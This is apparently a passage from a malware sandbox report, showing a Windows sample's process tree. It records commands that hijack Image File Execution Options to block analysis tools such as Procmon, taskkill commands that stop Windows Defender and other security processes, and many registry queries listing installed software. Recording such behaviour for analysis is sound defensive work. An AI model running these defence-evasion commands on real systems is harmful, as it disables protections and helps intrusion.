      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    C:\Windows\system32\cmd.exe (PID 1224)
      cmd.exe
        C:\Windows\system32\reg.exe (PID 1952)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
        C:\Windows\system32\reg.exe (PID 924)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
    C:\Windows\System32\reg.exe (PID 684)
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    C:\Windows\system32\cmd.exe (PID 1560)
      cmd.exe
        C:\Windows\system32\reg.exe (PID 1836)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
        C:\Windows\system32\reg.exe (PID 1620)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
    C:\Windows\system32\cmd.exe (PID 1076)
      cmd.exe
        C:\Windows\system32\reg.exe (PID 1940)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
        C:\Windows\system32\reg.exe (PID 1924)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
    C:\Windows\system32\cmd.exe (PID 2036)
      cmd.exe
        C:\Windows\system32\reg.exe (PID 1892)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
        C:\Windows\system32\reg.exe (PID 796)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
    C:\Windows\System32\taskkill.exe (PID 1708)
      "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
      - Kills process with taskkill
    C:\Windows\system32\cmd.exe (PID 936)
      cmd.exe
        C:\Windows\system32\reg.exe (PID 992)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
        C:\Windows\system32\reg.exe (PID 276)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
    C:\Windows\system32\cmd.exe (PID 1400)
      cmd.exe
        C:\Windows\system32\reg.exe (PID 1488)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
        C:\Windows\system32\reg.exe (PID 1556)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
    C:\Windows\system32\cmd.exe (PID 332)
      cmd.exe
        C:\Windows\system32\reg.exe (PID 432)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
        C:\Windows\system32\reg.exe (PID 524)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
    C:\Windows\system32\cmd.exe (PID 1232)
      cmd.exe
        C:\Windows\system32\reg.exe (PID 276)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
        C:\Windows\system32\reg.exe (PID 396)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
    C:\Windows\system32\cmd.exe (PID 1204)
      cmd.exe
        C:\Windows\system32\reg.exe (PID 972)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
        C:\Windows\system32\reg.exe (PID 1584)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
    C:\Windows\system32\cmd.exe (PID 2032)
      cmd.exe
        C:\Windows\system32\reg.exe (PID 824)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
        C:\Windows\system32\reg.exe (PID 1084)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
    C:\Windows\System32\taskkill.exe (PID 1932)
      "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
      - Kills process with taskkill
    C:\Windows\system32\cmd.exe (PID 1480)
      cmd.exe
        C:\Windows\system32\reg.exe (PID 1972)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
        C:\Windows\system32\reg.exe (PID 2028)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
    C:\Windows\system32\cmd.exe (PID 924)
      cmd.exe
        C:\Windows\system32\reg.exe (PID 1556)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
        C:\Windows\system32\reg.exe (PID 1464)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
    C:\Windows\system32\cmd.exe (PID 432)
      cmd.exe
        C:\Windows\system32\reg.exe (PID 1248)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:64
        C:\Windows\system32\reg.exe (PID 276)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:32
    C:\Windows\system32\cmd.exe (PID 536)
      cmd.exe
        C:\Windows\system32\reg.exe (PID 1892)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
        C:\Windows\system32\reg.exe (PID 1140)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
    C:\Windows\system32\cmd.exe (PID 1068)
      cmd.exe
        C:\Windows\system32\reg.exe (PID 824)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
        C:\Windows\system32\reg.exe (PID 1488)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
    C:\Windows\system32\cmd.exe (PID 1884)
      cmd.exe
        C:\Windows\system32\reg.exe (PID 1124)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
        C:\Windows\system32\reg.exe (PID 1944)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
    C:\Windows\system32\cmd.exe (PID 1044)
      cmd.exe
        C:\Windows\system32\reg.exe (PID 1932)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:64
        C:\Windows\system32\reg.exe (PID 932)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:32
    C:\Windows\System32\taskkill.exe (PID 616)
      "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
      - Kills process with taskkill
    C:\Windows\system32\cmd.exe (PID 276)
      cmd.exe
        C:\Windows\system32\reg.exe (PID 1892)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
        C:\Windows\system32\reg.exe (PID 1468)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
    C:\Windows\system32\cmd.exe (PID 1964)
      cmd.exe
        C:\Windows\system32\reg.exe (PID 2016)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
        C:\Windows\system32\reg.exe (PID 1736)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
    C:\Windows\system32\cmd.exe (PID 1940)
      cmd.exe
        C:\Windows\system32\reg.exe (PID 1984)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:64
        C:\Windows\system32\reg.exe (PID 2028)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:32
    C:\Windows\system32\cmd.exe (PID 824)
      cmd.exe
        C:\Windows\system32\reg.exe (PID 396)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
        C:\Windows\system32\reg.exe (PID 1900)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
    C:\Windows\system32\cmd.exe (PID 1944)
      cmd.exe
        C:\Windows\system32\reg.exe (PID 1248)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
        C:\Windows\system32\reg.exe (PID 1884)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
    C:\Windows\system32\cmd.exe (PID 1648)
      cmd.exe
        C:\Windows\system32\reg.exe (PID 924)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
        C:\Windows\system32\reg.exe (PID 1996)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
    C:\Windows\system32\cmd.exe (PID 432)
      cmd.exe
        C:\Windows\system32\reg.exe (PID 1332)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:64
        C:\Windows\system32\reg.exe (PID 560)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:32
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F2⤵
- Kills process with taskkill
PID:1204
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2036
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:643⤵PID:268
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:323⤵PID:1736
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:972
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:643⤵PID:1140
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:323⤵PID:1708
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1984
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:643⤵PID:2040
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:323⤵PID:1636
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1924
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:643⤵PID:1836
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:323⤵PID:1196
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1176
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:643⤵PID:528
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:323⤵PID:1072
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1428
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:643⤵PID:536
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:323⤵PID:1884
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:548
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:643⤵PID:1948
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:323⤵PID:560
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:2032
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:936
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:643⤵PID:1952
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:323⤵PID:268
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:388
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:643⤵PID:1972
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:323⤵PID:1708
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:684
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:643⤵PID:616
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:323⤵PID:1988
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1836
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:643⤵PID:1976
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:323⤵PID:812
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1072
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:643⤵PID:1248
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:323⤵PID:756
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1224
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:643⤵PID:1332
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:323⤵PID:1076
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1400
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:643⤵PID:1464
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:323⤵PID:1996
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1232
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:643⤵PID:1736
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:323⤵PID:268
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1140
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:643⤵PID:2028
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:323⤵PID:1956
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:616
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:643⤵PID:1196
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:323⤵PID:1640
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:812
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:643⤵PID:1068
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:323⤵PID:560
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F2⤵
- Kills process with taskkill
PID:1884
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2020
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:643⤵PID:1584
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:323⤵PID:1892
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2040
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:643⤵PID:2028
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:323⤵PID:1988
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:528
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:643⤵PID:1640
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:323⤵PID:332
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:992
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:643⤵PID:560
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:323⤵PID:1736
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1952
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:643⤵PID:1948
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:323⤵PID:756
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1584
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:643⤵PID:1404
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:323⤵PID:324
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1988
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:643⤵PID:536
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:323⤵PID:2016
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1468
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:643⤵PID:560
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:323⤵PID:1332
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1972
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:643⤵PID:756
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:323⤵PID:1956
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2028
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:643⤵PID:1640
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:323⤵PID:536
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2032
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:643⤵PID:1932
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:323⤵PID:1332
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1892
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:643⤵PID:2044
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:323⤵PID:1076
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1640
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:643⤵PID:1464
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:323⤵PID:1636
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1332
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:643⤵PID:1956
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:323⤵PID:924
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:560
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:643⤵PID:324
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:323⤵PID:1620
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1884
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:643⤵PID:656
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:323⤵PID:2032
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1436
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:643⤵PID:1988
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:323⤵PID:1708
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:528
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:643⤵PID:1996
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:323⤵PID:1400
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:276
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:643⤵PID:1232
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:323⤵PID:1480
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:936
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:704
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:643⤵PID:548
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:323⤵PID:2036
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1952
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:643⤵PID:824
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:323⤵PID:1992
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F2⤵
- Kills process with taskkill
PID:1464
-
-
